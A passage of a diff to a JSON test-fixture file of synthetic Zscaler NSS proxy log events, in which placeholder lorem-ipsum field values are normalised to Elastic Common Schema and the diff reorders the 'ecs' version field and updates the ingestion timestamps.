"2021-12-14T14:59:54.590727346Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quunt ZSCALERNSS: time=numquam Jan 20 2:14:16 2017^^timezone=CT^^action=Blocked^^reason=failure^^hostname=dquia107.www.test^^protocol=ipv6^^serverip=10.128.173.19^^url=https://api.example.com/ori/tconsect.html?ercit=eporroq#ulla^^urlcategory=iqu^^urlclass=oin^^dlpdictionaries=hil^^dlpengine=cingel^^filetype=modocon^^threatcategory=ipsu^^threatclass=ntNeq^^pagerisk=tate^^threatname=urExce^^clientpublicIP=asi^^ClientIP=10.88.172.34^^location=atv^^refererURL=https://example.org/liquaUte/alorum.txt?ria=atDu#nsec^^useragent=Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36^^department=maperi^^user=agnaaliq^^event_id=tlaboree^^clienttranstime=norumet^^requestmethod=dtempo^^requestsize=7680^^requestversion=col^^status=mve^^responsesize=3916^^responseversion=tinvolup^^transactionsize=2365", "event": { - "ingested": "2021-06-14T08:26:19.844934200Z" + "ingested": "2021-12-14T14:59:54.590727732Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "inv ZSCALERNSS: time=rroq Feb 3 9:16:50 2017^^timezone=CT^^action=Allowed^^reason=unknown^^hostname=lloin4019.www.localhost^^protocol=igmp^^serverip=10.130.241.232^^url=https://api.example.org/rure/asiarchi.txt?loremeu=aturve#utfug^^urlcategory=aturQu^^urlclass=aaliq^^dlpdictionaries=mipsamvo^^dlpengine=eiusmod^^filetype=emoe^^threatcategory=uiinea^^threatclass=mnisiut^^pagerisk=avolu^^threatname=Except^^clientpublicIP=olup^^ClientIP=10.238.224.49^^location=asper^^refererURL=https://example.net/naal/equun.gif?mve=uia#iciad^^useragent=Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=mad^^user=onse^^event_id=redol^^clienttranstime=gnaa^^requestmethod=mod^^requestsize=5107^^requestversion=dtempori^^status=toditaut^^responsesize=7889^^responseversion=dexerc^^transactionsize=2302", "event": { - "ingested": "2021-06-14T08:26:19.844939200Z" + "ingested": "2021-12-14T14:59:54.590728261Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eprehend ZSCALERNSS: time=asnu Feb 18 4:19:24 2017^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=tamet6317.www.host^^protocol=igmp^^serverip=10.115.53.31^^url=https://example.com/emUte/molestia.htm?orroqu=elitsed#labore^^urlcategory=uela^^urlclass=ntexplic^^dlpdictionaries=uto^^dlpengine=iuntNequ^^filetype=esseq^^threatcategory=aincidun^^threatclass=quatD^^pagerisk=isqua^^threatname=uta^^clientpublicIP=emo^^ClientIP=10.2.67.127^^location=licaboN^^refererURL=https://mail.example.org/cupi/strude.htm?dunt=litsedq#nderiti^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=mdolore^^user=Cic^^event_id=olorema^^clienttranstime=mollita^^requestmethod=tatem^^requestsize=6156^^requestversion=aeab^^status=teur^^responsesize=609^^responseversion=inBC^^transactionsize=2622", "event": { - "ingested": "2021-06-14T08:26:19.844944300Z" + "ingested": "2021-12-14T14:59:54.590728650Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tur ZSCALERNSS: time=ictas Mar 4 11:21:59 2017^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=saquaea6344.www.invalid^^protocol=igmp^^serverip=10.204.214.251^^url=https://mail.example.net/repreh/plic.jpg?utlabo=tetur#tionula^^urlcategory=ritqu^^urlclass=ecatcupi^^dlpdictionaries=uamei^^dlpengine=undeomni^^filetype=tas^^threatcategory=autfugi^^threatclass=tasun^^pagerisk=duntutla^^threatname=ntium^^clientpublicIP=iration^^ClientIP=10.101.38.213^^location=orisni^^refererURL=https://example.org/modoc/boNem.gif?ssusci=animid#mpo^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=atuse^^user=ueipsa^^event_id=scipitl^^clienttranstime=eumi^^requestmethod=quasiarc^^requestsize=3487^^requestversion=leumiur^^status=tetura^^responsesize=5328^^responseversion=offici^^transactionsize=501", "event": { - "ingested": "2021-06-14T08:26:19.844950Z" + "ingested": "2021-12-14T14:59:54.590729052Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "roquisqu ZSCALERNSS: time=edolorin Mar 18 6:24:33 2017^^timezone=GMT+02:00^^action=Allowed^^reason=failure^^hostname=utaliqu4248.www.localhost^^protocol=igmp^^serverip=10.18.226.72^^url=https://api.example.com/tcu/iatqu.jpg?quovo=urExcep#ema^^urlcategory=suntex^^urlclass=iacons^^dlpdictionaries=occaec^^dlpengine=acommodi^^filetype=essecill^^threatcategory=billoi^^threatclass=moles^^pagerisk=dipiscin^^threatname=olup^^clientpublicIP=aco^^ClientIP=10.101.85.169^^location=natu^^refererURL=https://internal.example.net/enim/Finibus.htm?mporainc=xea#taed^^useragent=Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=billo^^user=rroqu^^event_id=dquiaco^^clienttranstime=nibus^^requestmethod=vitaed^^requestsize=2352^^requestversion=ptasnula^^status=oru^^responsesize=2118^^responseversion=upt^^transactionsize=7879", "event": { - "ingested": "2021-06-14T08:26:19.844955100Z" + "ingested": "2021-12-14T14:59:54.590729439Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "eprehend ZSCALERNSS: time=rem Apr 2 1:27:07 2017^^timezone=GMT-07:00^^action=Allowed^^reason=unknown^^hostname=mdolore473.internal.test^^protocol=igmp^^serverip=10.87.100.240^^url=https://www5.example.com/apariatu/lorsita.gif?msequ=uat#lupta^^urlcategory=npr^^urlclass=etconsec^^dlpdictionaries=caboNem^^dlpengine=urExcept^^filetype=rumetMal^^threatcategory=oconse^^threatclass=mag^^pagerisk=tob^^threatname=dolores^^clientpublicIP=equamnih^^ClientIP=10.242.182.193^^location=itempo^^refererURL=https://mail.example.com/redol/ecillum.html?radipis=ctetu#orinrep^^useragent=Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=nder^^user=stenatus^^event_id=equep^^clienttranstime=ever^^requestmethod=tali^^requestsize=2124^^requestversion=erspi^^status=iqu^^responsesize=7509^^responseversion=incidid^^transactionsize=2617", "event": { - "ingested": "2021-06-14T08:26:19.844959900Z" + "ingested": "2021-12-14T14:59:54.590729819Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "autemv ZSCALERNSS: time=emq Apr 16 8:29:41 2017^^timezone=GMT-07:00^^action=Blocked^^reason=failure^^hostname=tatio6513.www.invalid^^protocol=rdp^^serverip=10.229.242.223^^url=https://internal.example.net/ende/abor.jpg?riameaqu=ame#tesseq^^urlcategory=niam^^urlclass=pernat^^dlpdictionaries=rerepre^^dlpengine=nculpaq^^filetype=culpaqui^^threatcategory=tvolup^^threatclass=tdolore^^pagerisk=ventore^^threatname=red^^clientpublicIP=sinto^^ClientIP=10.80.57.247^^location=est^^refererURL=https://api.example.net/aev/inrepr.gif?iadese=nisiu#imad^^useragent=Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=ptatem^^user=itasp^^event_id=dexe^^clienttranstime=tat^^requestmethod=onproide^^requestsize=2737^^requestversion=cillumd^^status=riosa^^responsesize=204^^responseversion=aspernat^^transactionsize=2460", "event": { - "ingested": "2021-06-14T08:26:19.844965Z" + "ingested": "2021-12-14T14:59:54.590730284Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "caecat ZSCALERNSS: time=rautod Apr 30 3:32:16 2017^^timezone=PT^^action=Allowed^^reason=failure^^hostname=lapar1599.www.lan^^protocol=ipv6^^serverip=10.193.66.155^^url=https://example.com/ame/amvolu.txt?equaturv=lamc#mvolupta^^urlcategory=Utenima^^urlclass=iqua^^dlpdictionaries=luptat^^dlpengine=deriti^^filetype=sintocc^^threatcategory=cididu^^threatclass=uteir^^pagerisk=boree^^threatname=isn^^clientpublicIP=ulla^^ClientIP=10.106.77.138^^location=aconse^^refererURL=https://mail.example.net/tnonproi/squira.html?itation=veleum#piciatis^^useragent=Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=henderi^^user=iusmodt^^event_id=enim^^clienttranstime=emaperia^^requestmethod=Section^^requestsize=4329^^requestversion=iame^^status=orroquis^^responsesize=6146^^responseversion=tiumd^^transactionsize=6099", "event": { - "ingested": "2021-06-14T08:26:19.844969600Z" + "ingested": "2021-12-14T14:59:54.590730675Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mexer ZSCALERNSS: time=estla May 14 10:34:50 2017^^timezone=ET^^action=Allowed^^reason=success^^hostname=aquioff3853.www.localdomain^^protocol=udp^^serverip=10.236.230.136^^url=https://mail.example.org/uisnostr/reetdol.txt?ugi=niamquis#nisi^^urlcategory=emveleum^^urlclass=olup^^dlpdictionaries=nde^^dlpengine=abillo^^filetype=undeom^^threatcategory=emullamc^^threatclass=tec^^pagerisk=Nemo^^threatname=tutlabo^^clientpublicIP=mveleum^^ClientIP=10.54.159.1^^location=sBonorum^^refererURL=https://mail.example.net/quira/tassita.gif?oremi=ugitsedq#turmag^^useragent=Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91^^department=asnulapa^^user=mUteni^^event_id=quira^^clienttranstime=rror^^requestmethod=tatema^^requestsize=2446^^requestversion=loinve^^status=tatevel^^responsesize=3862^^responseversion=equu^^transactionsize=5373", "event": { - "ingested": "2021-06-14T08:26:19.844974200Z" + "ingested": "2021-12-14T14:59:54.590731066Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "atae ZSCALERNSS: time=tetura May 29 5:37:24 2017^^timezone=OMST^^action=Allowed^^reason=success^^hostname=ura675.mail.localdomain^^protocol=ggp^^serverip=10.49.242.174^^url=https://api.example.com/radipis/cive.gif?orumSec=nisiuta#stiaecon^^urlcategory=dol^^urlclass=sumquiad^^dlpdictionaries=setquas^^dlpengine=minim^^filetype=oeni^^threatcategory=untutlab^^threatclass=tvolup^^pagerisk=consecte^^threatname=pteurs^^clientpublicIP=catcupi^^ClientIP=10.131.246.134^^location=tiaecon^^refererURL=https://api.example.com/amquisno/uido.gif?queporro=uid#snostrum^^useragent=Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=aconsequ^^user=umdolo^^event_id=rroqui^^clienttranstime=ursin^^requestmethod=utemvel^^requestsize=5325^^requestversion=atu^^status=iusm^^responsesize=4968^^responseversion=laudanti^^transactionsize=16", "event": { - "ingested": "2021-06-14T08:26:19.844981200Z" + "ingested": "2021-12-14T14:59:54.590731590Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "rere ZSCALERNSS: time=cta Jun 12 12:39:58 2017^^timezone=CT^^action=Blocked^^reason=unknown^^hostname=iamea478.www5.host^^protocol=ipv6-icmp^^serverip=10.142.120.198^^url=https://mail.example.org/oin/itseddoe.html?citati=uamei#eursinto^^urlcategory=litesse^^urlclass=fugiatn^^dlpdictionaries=uaeabi^^dlpengine=aaliq^^filetype=nat^^threatcategory=uovolupt^^threatclass=ende^^pagerisk=orumSe^^threatname=dolor^^clientpublicIP=isiut^^ClientIP=10.166.10.42^^location=emulla^^refererURL=https://www.example.com/itae/dtempo.html?etMaloru=lmo#iquidex^^useragent=Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=uamqu^^user=olori^^event_id=ido^^clienttranstime=mcorpor^^requestmethod=doconse^^requestsize=2522^^requestversion=emUte^^status=iusmodi^^responsesize=1046^^responseversion=tura^^transactionsize=6695", "event": { - "ingested": "2021-06-14T08:26:19.844986Z" + "ingested": "2021-12-14T14:59:54.590732116Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "equat ZSCALERNSS: time=aliquid Jun 26 7:42:33 2017^^timezone=GMT+02:00^^action=Allowed^^reason=unknown^^hostname=eaque6543.api.domain^^protocol=udp^^serverip=10.138.188.201^^url=https://mail.example.com/eseruntm/lpaquiof.html?magnaal=uscip#umS^^urlcategory=iciadese^^urlclass=riatur^^dlpdictionaries=oeni^^dlpengine=dol^^filetype=dol^^threatcategory=atur^^threatclass=issu^^pagerisk=identsu^^threatname=piscivel^^clientpublicIP=hend^^ClientIP=10.128.184.241^^location=aer^^refererURL=https://api.example.net/umd/sciveli.htm?tur=acon#Nemoenim^^useragent=Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=urau^^user=etur^^event_id=rsitvol^^clienttranstime=utali^^requestmethod=sed^^requestsize=6793^^requestversion=sec^^status=uid^^responsesize=3520^^responseversion=acom^^transactionsize=1142", "event": { - "ingested": "2021-06-14T08:26:19.844990800Z" + "ingested": "2021-12-14T14:59:54.590733039Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ectob ZSCALERNSS: time=mrema Jul 11 2:45:07 2017^^timezone=CET^^action=Allowed^^reason=failure^^hostname=eufug1756.mail.corp^^protocol=ggp^^serverip=10.53.101.131^^url=https://example.net/snulap/enimadm.html?writte=sitvo#ine^^urlcategory=urerepre^^urlclass=asnulap^^dlpdictionaries=ipi^^dlpengine=idolorem^^filetype=exerci^^threatcategory=idata^^threatclass=ese^^pagerisk=mmodoco^^threatname=amni^^clientpublicIP=atnul^^ClientIP=10.213.57.165^^location=illumq^^refererURL=https://www5.example.org/ite/tasnul.txt?evitae=amvo#tnul^^useragent=Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=ectetura^^user=isau^^event_id=itinvol^^clienttranstime=ten^^requestmethod=litanim^^requestsize=2135^^requestversion=orsitam^^status=modico^^responsesize=2990^^responseversion=itatio^^transactionsize=6735", "event": { - "ingested": "2021-06-14T08:26:19.844995300Z" + "ingested": "2021-12-14T14:59:54.590733449Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "riame ZSCALERNSS: time=riat Jul 25 9:47:41 2017^^timezone=GMT+02:00^^action=Blocked^^reason=unknown^^hostname=orp5697.www.invalid^^protocol=ggp^^serverip=10.243.6.41^^url=https://internal.example.org/etcon/onsequu.gif?Bonoru=madminim#ents^^urlcategory=emacc^^urlclass=emp^^dlpdictionaries=lamcola^^dlpengine=veli^^filetype=venia^^threatcategory=risni^^threatclass=idolores^^pagerisk=paria^^threatname=mmod^^clientpublicIP=iti^^ClientIP=10.55.81.14^^location=lorsitam^^refererURL=https://api.example.org/onpr/litseddo.gif?oremqu=idex#radip^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=tenim^^user=eiusmo^^event_id=ainc^^clienttranstime=miurerep^^requestmethod=lestia^^requestsize=3606^^requestversion=iduntu^^status=pisci^^responsesize=3601^^responseversion=nostrud^^transactionsize=203", "event": { - "ingested": "2021-06-14T08:26:19.844999900Z" + "ingested": "2021-12-14T14:59:54.590733842Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ore ZSCALERNSS: time=esse Aug 8 4:50:15 2017^^timezone=PST^^action=Blocked^^reason=success^^hostname=pariatur7238.www5.invalid^^protocol=tcp^^serverip=10.33.144.10^^url=https://www.example.org/rur/itse.gif?pisciv=fugiatqu#seos^^urlcategory=exercita^^urlclass=edolori^^dlpdictionaries=eve^^dlpengine=tco^^filetype=tvol^^threatcategory=oluptate^^threatclass=lit^^pagerisk=santi^^threatname=ritati^^clientpublicIP=iciade^^ClientIP=10.202.224.79^^location=idolo^^refererURL=https://example.com/ptassita/caecatcu.txt?eturadip=olorsi#itseddo^^useragent=Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=seos^^user=rios^^event_id=labo^^clienttranstime=lpaquiof^^requestmethod=quu^^requestsize=2203^^requestversion=ntexpl^^status=abor^^responsesize=4241^^responseversion=enbyCi^^transactionsize=3813", "event": { - "ingested": "2021-06-14T08:26:19.845004800Z" + "ingested": "2021-12-14T14:59:54.590734243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tat ZSCALERNSS: time=eufugia Aug 22 11:52:50 2017^^timezone=GMT-07:00^^action=Allowed^^reason=failure^^hostname=fficia2304.www5.home^^protocol=icmp^^serverip=10.158.18.51^^url=https://mail.example.com/qui/equeporr.jpg?itsedd=texpli#liquipex^^urlcategory=uisnos^^urlclass=quamqua^^dlpdictionaries=ntut^^dlpengine=mag^^filetype=meum^^threatcategory=mini^^threatclass=Loremip^^pagerisk=oreeu^^threatname=nvo^^clientpublicIP=iamqui^^ClientIP=10.20.124.138^^location=aqui^^refererURL=https://www.example.net/lpa/isn.htm?iat=ffic#siuta^^useragent=Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36^^department=aparia^^user=CSe^^event_id=exerci^^clienttranstime=inesciu^^requestmethod=quid^^requestsize=5452^^requestversion=emu^^status=orem^^responsesize=6317^^responseversion=ate^^transactionsize=4386", "event": { - "ingested": "2021-06-14T08:26:19.845009200Z" + "ingested": "2021-12-14T14:59:54.590734711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tqu ZSCALERNSS: time=eirur Sep 6 6:55:24 2017^^timezone=CT^^action=Allowed^^reason=unknown^^hostname=mquisnos7453.home^^protocol=igmp^^serverip=10.134.128.27^^url=https://api.example.net/lup/iumtotam.html?ipitlabo=userror#eacommo^^urlcategory=nderi^^urlclass=liqua^^dlpdictionaries=ariatur^^dlpengine=labo^^filetype=sautei^^threatcategory=ataevita^^threatclass=voluptas^^pagerisk=velill^^threatname=rspic^^clientpublicIP=orinrepr^^ClientIP=10.118.177.136^^location=borumSec^^refererURL=https://www5.example.org/snisiut/siar.txt?inB=orp#ender^^useragent=Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=rumSecti^^user=Utenima^^event_id=olore^^clienttranstime=orumS^^requestmethod=olor^^requestsize=6908^^requestversion=eursint^^status=orio^^responsesize=1044^^responseversion=iameaqu^^transactionsize=2429", "event": { - "ingested": "2021-06-14T08:26:19.845013800Z" + "ingested": "2021-12-14T14:59:54.590735155Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "olu ZSCALERNSS: time=iameaque Sep 20 1:57:58 2017^^timezone=OMST^^action=Allowed^^reason=unknown^^hostname=aquio748.www.localhost^^protocol=igmp^^serverip=10.68.8.143^^url=https://example.org/onproide/uamnih.htm?tatisetq=uidolo#umdolore^^urlcategory=dmi^^urlclass=tam^^dlpdictionaries=oremip^^dlpengine=eufugi^^filetype=dunt^^threatcategory=ames^^threatclass=amni^^pagerisk=tatio^^threatname=amquisno^^clientpublicIP=modoc^^ClientIP=10.125.120.97^^location=uid^^refererURL=https://internal.example.com/onev/orsi.txt?oreseo=reprehen#itamet^^useragent=Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36^^department=idolo^^user=reet^^event_id=lorem^^clienttranstime=texplic^^requestmethod=edutp^^requestsize=911^^requestversion=assi^^status=eserun^^responsesize=3034^^responseversion=eniamqu^^transactionsize=1185", "event": { - "ingested": "2021-06-14T08:26:19.845018800Z" + "ingested": "2021-12-14T14:59:54.590735570Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tatevel ZSCALERNSS: time=midestl Oct 4 9:00:32 2017^^timezone=PST^^action=Blocked^^reason=unknown^^hostname=remagnam796.mail.corp^^protocol=rdp^^serverip=10.143.0.78^^url=https://www5.example.org/obeataev/umf.htm?moll=quaeabil#emip^^urlcategory=aturQu^^urlclass=itesse^^dlpdictionaries=iamqui^^dlpengine=quide^^filetype=aria^^threatcategory=inim^^threatclass=etdol^^pagerisk=Sed^^threatname=oremeumf^^clientpublicIP=lesti^^ClientIP=10.137.164.122^^location=enima^^refererURL=https://www5.example.net/ico/giatquo.htm?evi=tionula#accus^^useragent=Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30^^department=amnihil^^user=orissus^^event_id=atems^^clienttranstime=nimaveni^^requestmethod=mwrit^^requestsize=2923^^requestversion=itse^^status=officiad^^responsesize=4982^^responseversion=nimadmin^^transactionsize=5577", "event": { - "ingested": "2021-06-14T08:26:19.845023200Z" + "ingested": "2021-12-14T14:59:54.590735967Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "quiavolu ZSCALERNSS: time=upta Oct 19 4:03:07 2017^^timezone=OMST^^action=Blocked^^reason=failure^^hostname=etdolore4227.internal.corp^^protocol=icmp^^serverip=10.30.87.51^^url=https://mail.example.org/consequa/eaqueip.gif?aevitaed=byCic#leumiur^^urlcategory=ptatemse^^urlclass=siarc^^dlpdictionaries=fdeFin^^dlpengine=eleumi^^filetype=edic^^threatcategory=udexerc^^threatclass=tatno^^pagerisk=isnisiut^^threatname=atatnon^^clientpublicIP=lica^^ClientIP=10.156.177.53^^location=Nequ^^refererURL=https://www.example.com/epo/rsit.txt?onorumet=ptatema#eavolup^^useragent=Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36^^department=rmagnido^^user=psaquaea^^event_id=rchit^^clienttranstime=psumq^^requestmethod=ptatev^^requestsize=6552^^requestversion=xerc^^status=ctetura^^responsesize=7556^^responseversion=tDuis^^transactionsize=3281", "event": { - "ingested": "2021-06-14T08:26:19.845027600Z" + "ingested": "2021-12-14T14:59:54.590736379Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "tat ZSCALERNSS: time=equ Nov 2 11:05:41 2017^^timezone=GMT+02:00^^action=Blocked^^reason=unknown^^hostname=rors1935.api.domain^^protocol=udp^^serverip=10.83.138.34^^url=https://example.org/tmo/onofdeF.txt?oremip=its#uptasnul^^urlcategory=aliqui^^urlclass=datatnon^^dlpdictionaries=aedict^^dlpengine=niamqui^^filetype=usmodite^^threatcategory=tlabo^^threatclass=tatemse^^pagerisk=ntoccaec^^threatname=uamestqu^^clientpublicIP=mpor^^ClientIP=10.111.249.184^^location=ptatemU^^refererURL=https://example.org/rumSe/tatnonp.jpg?tlabore=idunt#expl^^useragent=Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]^^department=onsectet^^user=dentsunt^^event_id=inea^^clienttranstime=animid^^requestmethod=upta^^requestsize=313^^requestversion=onnumqua^^status=quioff^^responsesize=470^^responseversion=upt^^transactionsize=6017", "event": { - "ingested": "2021-06-14T08:26:19.845032400Z" + "ingested": "2021-12-14T14:59:54.590736794Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "nvol ZSCALERNSS: time=dtemp Nov 16 6:08:15 2017^^timezone=PT^^action=Allowed^^reason=unknown^^hostname=idexeac1655.internal.test^^protocol=ipv6^^serverip=10.141.195.13^^url=https://mail.example.com/orsitvol/ntor.htm?itqu=minimav#smodtem^^urlcategory=roquisqu^^urlclass=ariat^^dlpdictionaries=midestl^^dlpengine=quatu^^filetype=avolu^^threatcategory=teturad^^threatclass=itesse^^pagerisk=expl^^threatname=essecill^^clientpublicIP=totamre^^ClientIP=10.180.150.47^^location=orsitv^^refererURL=https://internal.example.net/uisaute/uun.jpg?olupt=nemulla#asp^^useragent=Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90^^department=ncul^^user=taliq^^event_id=tautfugi^^clienttranstime=fdeFinib^^requestmethod=uip^^requestsize=3940^^requestversion=sectetur^^status=edquian^^responsesize=7810^^responseversion=turQuis^^transactionsize=4046", "event": { - "ingested": "2021-06-14T08:26:19.845037100Z" + "ingested": "2021-12-14T14:59:54.590737228Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "uames ZSCALERNSS: time=tconsec Dec 1 1:10:49 2017^^timezone=GMT-07:00^^action=Allowed^^reason=failure^^hostname=laboree3880.api.invalid^^protocol=rdp^^serverip=10.166.195.20^^url=https://internal.example.org/rumexe/xerci.gif?olor=quiav#gna^^urlcategory=Nem^^urlclass=tdolorem^^dlpdictionaries=eacomm^^dlpengine=upidata^^filetype=ici^^threatcategory=usant^^threatclass=mipsumq^^pagerisk=ident^^threatname=nimide^^clientpublicIP=quelaud^^ClientIP=10.255.40.12^^location=rro^^refererURL=https://api.example.com/nimv/emeu.htm?rem=tseddoei#teursint^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=remagnaa^^user=lamcolab^^event_id=ceroinB^^clienttranstime=umqui^^requestmethod=citation^^requestsize=7073^^requestversion=mcorpori^^status=orisn^^responsesize=2266^^responseversion=etMalor^^transactionsize=7800", "event": { - "ingested": "2021-06-14T08:26:19.845041600Z" + "ingested": "2021-12-14T14:59:54.590737665Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "cta ZSCALERNSS: time=ercitat Dec 15 8:13:24 2017^^timezone=PT^^action=Blocked^^reason=unknown^^hostname=tecto708.www5.example^^protocol=rdp^^serverip=10.22.122.43^^url=https://example.org/tvolu/dutper.html?nbyCicer=scipit#equuntu^^urlcategory=quamni^^urlclass=turveli^^dlpdictionaries=isciv^^dlpengine=natus^^filetype=boreet^^threatcategory=luptasnu^^threatclass=ento^^pagerisk=snostr^^threatname=udexerc^^clientpublicIP=ovolupta^^ClientIP=10.100.143.226^^location=ametcon^^refererURL=https://internal.example.net/ecillu/quovol.html?ctasu=irat#sitame^^useragent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 